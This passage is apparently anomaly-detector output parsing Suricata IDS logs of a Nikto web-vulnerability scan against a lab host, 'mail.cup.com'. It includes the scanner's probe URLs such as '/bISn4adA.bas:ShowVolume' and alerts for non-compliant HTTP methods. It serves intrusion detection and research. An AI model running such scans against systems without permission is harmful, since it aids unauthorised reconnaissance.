"/parser/model/time": 1583349514.332343, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":66060875861775,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46930,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsfdeslo\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsfdeslo\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46930,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsfdeslo\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsfdeslo\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.nsfdeslo\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", 
"/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.nsfdeslo\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.nsfdeslo", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.nsfdeslo", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", 
"/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46930,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46930, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", 
"/parser/model/flow_id/flow_id": "\"flow_id\":66060875861775,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 66060875861775, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.332343+0000\",\"flow_id\":66060875861775,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46930,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsfdeslo\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsfdeslo\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.333976 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46932 -> 192.168.10.154:80", "/parser/model/time": 1583349514.333976, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", 
"/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46932, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.333976 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46932 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.old", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.334225+0000\",\"flow_id\":1835810740114780,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46932,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.old\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.old\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.334225, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1835810740114780,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46932,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.old\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.old\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46932,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.old\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": 
"\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.old\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.old\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.old\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.old", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.old", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", 
"/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46932,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46932, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": 
"TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1835810740114780,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1835810740114780, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.334225+0000\",\"flow_id\":1835810740114780,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46932,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.old\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.old\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.336929 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 
192.168.10.238:46934 -> 192.168.10.154:80", "/parser/model/time": 1583349514.336929, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46934, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.336929 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46934 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.34 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.bas:ShowVolume", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": 
"{\"timestamp\":\"2020-03-04T19:18:34.337148+0000\",\"flow_id\":135802554818065,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46934,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.bas:ShowVolume\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.bas:ShowVolume\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.337148, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":135802554818065,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46934,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.bas:ShowVolume\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.bas:ShowVolume\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46934,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.bas:ShowVolume\",\"http_user_agent\":\"Mozilla\\/5.00 
(Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.bas:ShowVolume\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.bas:ShowVolume\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.bas:ShowVolume\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.bas:ShowVolume", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.bas:ShowVolume", "/parser/model/event_type/fileinfo/http/http_user_agent_str": 
"\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46934,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46934, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":135802554818065,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 135802554818065, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.337148+0000\",\"flow_id\":135802554818065,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46934,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.bas:ShowVolume\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.bas:ShowVolume\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.34 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", 
"AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.341111 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46936 -> 192.168.10.154:80", "/parser/model/time": 1583349514.341111, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46936, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": 